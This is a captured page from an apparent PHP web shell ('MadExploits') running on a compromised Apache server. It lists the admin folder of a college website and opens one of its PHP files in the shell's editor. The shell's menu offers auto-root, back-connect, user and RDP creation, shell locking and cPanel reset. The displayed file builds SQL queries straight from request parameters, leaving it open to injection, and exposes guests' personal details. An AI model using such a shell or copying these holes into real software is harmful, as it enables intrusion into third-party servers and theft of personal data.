Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.139.86.128
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
np_admin /
[ HOME SHELL ]
Name
Size
Permission
Action
SpryAssets
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
Logout.php
84
B
-rw-r--r--
Session_Update.php
2.58
KB
-rw-r--r--
User_Account.php
12.6
KB
-rw-r--r--
User_Profile.php
8.57
KB
-rw-r--r--
User_Profile_permmion.php
14.71
KB
-rw-r--r--
admin_home.php
2
KB
-rw-r--r--
admin_home_old.php
10.92
KB
-rw-r--r--
attand.php
9.14
KB
-rw-r--r--
college_profile.php
8.56
KB
-rw-r--r--
college_profile_edit.php
7.15
KB
-rw-r--r--
committee_member.php
9.53
KB
-rw-r--r--
committee_member_edit.php
7.74
KB
-rw-r--r--
committee_name.php
7.26
KB
-rw-r--r--
connection.php
177
B
-rw-r--r--
courses.php
8.14
KB
-rw-r--r--
courses_edit.php
6.64
KB
-rw-r--r--
databasebackup.php
3.58
KB
-rw-r--r--
databaserestore.php
2.65
KB
-rw-r--r--
error_log
1.36
KB
-rw-r--r--
foragte_password.php
307
B
-rw-r--r--
gallery.php
8.79
KB
-rw-r--r--
gallery_edit.php
6.94
KB
-rw-r--r--
index.php
2.4
KB
-rw-r--r--
login_2.php
18.94
KB
-rw-r--r--
new_notice.php
9.16
KB
-rw-r--r--
non_teaching.php
10.16
KB
-rw-r--r--
non_teaching_edit.php
8.21
KB
-rw-r--r--
principal_message.php
8.96
KB
-rw-r--r--
principal_message_edit.php
7.35
KB
-rw-r--r--
splash_view.php
7.33
KB
-rw-r--r--
teaching.php
10.14
KB
-rw-r--r--
teaching_edit.php
8.2
KB
-rw-r--r--
teching_edit.php
8.17
KB
-rw-r--r--
tender.php
8.69
KB
-rw-r--r--
update_and_delete.php
4.1
KB
-rw-r--r--
update_attand.php
6.89
KB
-rw-r--r--
update_notice.php
6.9
KB
-rw-r--r--
user_details.php
9.24
KB
-rw-r--r--
user_reg.php
4.26
KB
-rw-r--r--
validateuser.php
685
B
-rw-r--r--
view_notice.php
1.14
KB
-rw-r--r--
welcome.php
821
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin_home_old.php
<?php ob_start(); session_start(); error_reporting(4); include("includes/connection.php"); include_once("includes/function.inc.php"); validateUser(); extract($_POST); if(isset($_POST['Submit'])) { $Query=mysql_query("insert into room_services set room_categories='".$_POST['room_cate']."', room_name='".$_POST['room_name']."', room_services='".$_POST['room_services_name']."', services_rate='".$_POST['services_rate']."', discription='".$_POST['dicription']."'"); if(Query) { header("LOCATION:room_services.php"); } } if(isset($_GET['ID'])) { $Query_del=mysql_query("delete from room_services where id='".$_GET['ID']."'"); } if(isset($_GET['VID'])) { $Query_sel=mysql_fetch_array(mysql_query("select * from room_services where id='".$_GET['VID']."'")); } if(isset($_POST['update'])) { $Query_up=mysql_query("update room_services set room_categories='".$_POST['room_cate']."', room_name='".$_POST['room_name']."', room_services='".$_POST['room_services_name']."', services_rate='".$_POST['services_rate']."', discription='".$_POST['dicription']."' where id='".$_GET['VID']."'"); if($Query_up) { header("location:room_services.php"); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Admin Shri Kute Hotel</title> <link href="css/mystyle.css" rel="stylesheet" type="text/css" /> <style> *{ padding:0px; margin:0px; } .gradientBoxesWithOuterShadows { padding: 20px; background-color: #D5E4F3; /* outer shadows (note the rgba is red, green, blue, alpha) */ -webkit-box-shadow: 0px 0px 12px rgba(0, 0, 0, 0.8); -moz-box-shadow: 0px 1px 6px rgba(23, 69, 88, .5); /* rounded corners */ -webkit-border-radius: 12px; -moz-border-radius: 7px; border-radius: 7px; /* gradients */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, white), color-stop(15%, #ffffff), color-stop(100%, #070A62)); background: -moz-linear-gradient(top, #395AA9 0%, white 55%, #395AA9 130%); } .pop{ padding: 20px; background-color: #395AA9; /* outer shadows (note the rgba is red, green, blue, alpha) */ -webkit-box-shadow: 0px 0px 12px rgba(0, 0, 0, 0.8); -moz-box-shadow: 0px 1px 6px rgba(23, 69, 88, .5); /* rounded corners */ -webkit-border-radius: 12px; -moz-border-radius: 7px; border-radius: 7px; /* gradients */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, white), color-stop(15%, #ffffff), color-stop(100%, #ffff00)); background: -moz-linear-gradient(top, #ffff00 0%, white 55%, #ffff00 130%); } .cur{ cursor:pointer; } </style> <script> function show(text) { document.getElementById('PopUp').style.display = 'block'; document.getElementById('PopUpText').innerHTML = text; } function showIMG(event, text) { var el, x, y; el = document.getElementById('PopUpImage'); if (window.event) { x = window.event.clientX + document.documentElement.scrollLeft + document.body.scrollLeft; y = window.event.clientY + document.documentElement.scrollTop + + document.body.scrollTop; } else { x = event.clientX + window.scrollX; y = event.clientY + window.scrollY; } x -= 2; y -= 2; y = y+15 el.style.left = x + "px"; el.style.top = y + "px"; el.style.display = "block"; document.getElementById('PopUpImageName').src = text; } function clos(){ document.getElementById('sub3').style.display = 'none' document.getElementById('PopUp').style.display = 'none' ; } function showPos(event, text) { var el, x, y; el = document.getElementById('PopUp'); if (window.event) { x = window.event.clientX + document.documentElement.scrollLeft + document.body.scrollLeft; y = window.event.clientY + document.documentElement.scrollTop + + document.body.scrollTop; } else { x = event.clientX + window.scrollX; y = event.clientY + window.scrollY; } x -= 2; y -= 2; y = y+15 //el.style.left = x + "px"; //el.style.top = y + "px"; el.style.display = "block"; document.getElementById('PopUpText').innerHTML = text; } </script> </head> <body> <div class="outer"> <?php include("includes/header.inc.php"); ?> <br /> Welcome, Admin <div align="right"><img src="images/cal_icon.png" width="30px" class="cur" onclick="document.getElementById('sub3').style.display = 'block'";></div> <div class="gradientBoxesWithOuterShadows" id="sub3" style="position:fixed; display:none; z-index:3; top:calc(50% - 200px); left:calc(50% - 350px);"> <img src="images/calender_view.png" width="150px"> <img class="cur" align='right' style="position:relative; left:0px; right:5px;" src='images/close.png' width='30px' onclick="clos()"> <br> <h5><font color="black" size="4px"> Luxury Room </font></h5> <div align="center" > <table border=3 cellpadding="10" bordercolor="#ff0000" width="500px"> <?php echo "<tr>"; for($date=0;$date!=31;$date++){ $tomorrow = mktime(0,0,0,date("m"),date("d")+$date-1,date("Y")); if($date!=0) echo "<td align='center' bgcolor='#b0e0e6'><span >"."<font size='2px'>".date("d", $tomorrow)."</font>"."\n"."<font size='1px'>".date("D", $tomorrow)."</font>"."</span></td>"; else echo "<td align='center' bgcolor='#00bfff'>Room\Date</td>"; } for($room=1;$room!=9;$room++){ echo"<tr>"; for($date=0;$date!=31;$date++){ $tomorrow = mktime(0,0,0,date("m"),date("d")+$date,date("Y")); $h=date("d/m/20y", $tomorrow); if($date!=0){ $rs=mysql_query("select check_in_date,check_out_date,p_detail_id from booking_info where room_no='$room' and confrmation='reserve'"); if(mysql_num_rows($rs)>0){ $tru=0; $p_detail=''; $jay_rs=''; $jay_row=''; $first_name=''; $last_name=''; $addr=''; $contect=''; while($jay=mysql_fetch_array($rs)){ $p = explode("/",$jay['check_in_date']); $check_in = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $p = explode("/",$jay['check_out_date']); $check_out = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $p = explode("/",$h); $date1 = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $date1=$date1-1; if($check_in<=$date1 && $check_out>=$date1){ $tru=1; $p_detail=$jay['p_detail_id']; $jay_rs=mysql_query("select * from peronal_info where id='$p_detail'"); $jay_row=mysql_fetch_array($jay_rs); $first_name=$jay_row['first_name']; $last_name=$jay_row['last_name']; $addr=$jay_row['address']."<br>".$jay_row['city']." ".$jay_row['country']." (".$jay_row['zip_code'].")"; $contect=$jay_row['email_id']."<br> Mobile: ".$jay_row['contact_no']; break; } } if($tru==1){ echo "<td onclick='showPos(event,\"This Luxury Room No ".$room." is Booked...<br>To ".$first_name." ".$last_name." <br> Address : ".$addr." <br> Contect Info : ".$contect."\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/wrong.png' width='12px'>"."</span></td>"; }else echo "<td onclick='showPos(event,\"Luxury Room No $room <br> Room is Free To serve..:D...\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/right.png' width='12px'>"."</span></td>"; } else echo "<td onclick='showPos(event,\"Luxury Room No $room <br> Room is Free To serve... :D...\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/right.png' width='12px'>"."</span></td>"; }else echo "<td align='center' bgcolor='#eee9e9'>".$room."</td>"; } echo "</tr>"; } echo "</tr>"; ?> </table> </div> <h5><font color="white" size="4px"> Premium Room </font></h5> <div align="center" > <table border=3 cellpadding="3" bordercolor="#ff0000" width="600px"> <?php echo "<tr>"; for($date=0;$date!=31;$date++){ $tomorrow = mktime(0,0,0,date("m"),date("d")+$date-1,date("Y")); if($date!=0) echo "<td align='center' bgcolor='#b0e0e6'><span >"."<font size='2px'>".date("d", $tomorrow)."</font>"."\n"."<span>"."<font size='1px'>".date("D", $tomorrow)."</font>"."</span>"."</span></td>"; else echo "<td align='center' bgcolor='#00bfff'>Room\Date</td>"; } for($room=9;$room!=11;$room++){ echo"<tr>"; for($date=0;$date!=31;$date++){ $tomorrow = mktime(0,0,0,date("m"),date("d")+$date,date("Y")); $h=date("d/m/20y", $tomorrow); if($date!=0){ $rs=mysql_query("select check_in_date,check_out_date,p_detail_id from booking_info where room_no='$room' and confrmation='reserve'"); if(mysql_num_rows($rs)>0){ $tru=0; $p_detail=''; $jay_rs=''; $jay_row=''; $first_name=''; $last_name=''; $addr=''; $contect=''; while($jay=mysql_fetch_array($rs)){ $p = explode("/",$jay['check_in_date']); $check_in = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $p = explode("/",$jay['check_out_date']); $check_out = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $p = explode("/",$h); $date1 = (strtotime($p[2]."".$p[1]."".$p[0]))/24 /60 /60; $date1=$date1-1; if($check_in<=$date1 && $check_out>=$date1){ $tru=1; $p_detail=$jay['p_detail_id']; $jay_rs=mysql_query("select * from peronal_info where id='$p_detail'"); $jay_row=mysql_fetch_array($jay_rs); $first_name=$jay_row['first_name']; $last_name=$jay_row['last_name']; $addr=$jay_row['address']."<br>".$jay_row['city']." ".$jay_row['country']." (".$jay_row['zip_code'].")"; $contect=$jay_row['email_id']."<br> Mobile: ".$jay_row['contact_no']; break; } } if($tru==1){ echo "<td onclick='showPos(event,\"This Luxury Room No ".$room." is Booked...<br>To ".$first_name.$last_name." <br> Address : ".$addr." <br> Contect Info : ".$contect."\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/wrong.png' width='12px'>"."</span></td>"; }else echo "<td onclick='showPos(event,\"premium Room No $room <br> Room is Free To serve..:D...\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/right.png' width='12px'>"."</span></td>"; } else echo "<td onclick='showPos(event,\"premium Room No $room <br> Room is Free To serve... :D...\")' class='cur' align='center' bgcolor='#2f4f4f'><span>"."<img src='images/right.png' width='12px'>"."</span></td>"; }else echo "<td align='center' bgcolor='#eee9e9'>".$room."</td>"; } echo "</tr>"; } echo "</tr>"; ?> </table> </div> </div> <DIV class="pop" id='PopUp' style='z-index:4; display: none; position:fixed; left:calc(50% - 200px); top: 40%; border: solid black 1px; padding: 10px; background-color:#ffff00; text-align: justify; font-size: 12px; width: 400px;'> <img class="cur" align="right" onclick="document.getElementById('PopUp').style.display = 'none' " src="images/close.png" width="20px"> <br> <SPAN id='PopUpText'>TEXT</SPAN> </DIV> <div class="page"> </div> <?php include("includes/footer.inc.php"); ?> <script type="text/javascript"> var TabbedPanels1 = new Spry.Widget.TabbedPanels("TabbedPanels1"); </script> </div> </body> </html>
Close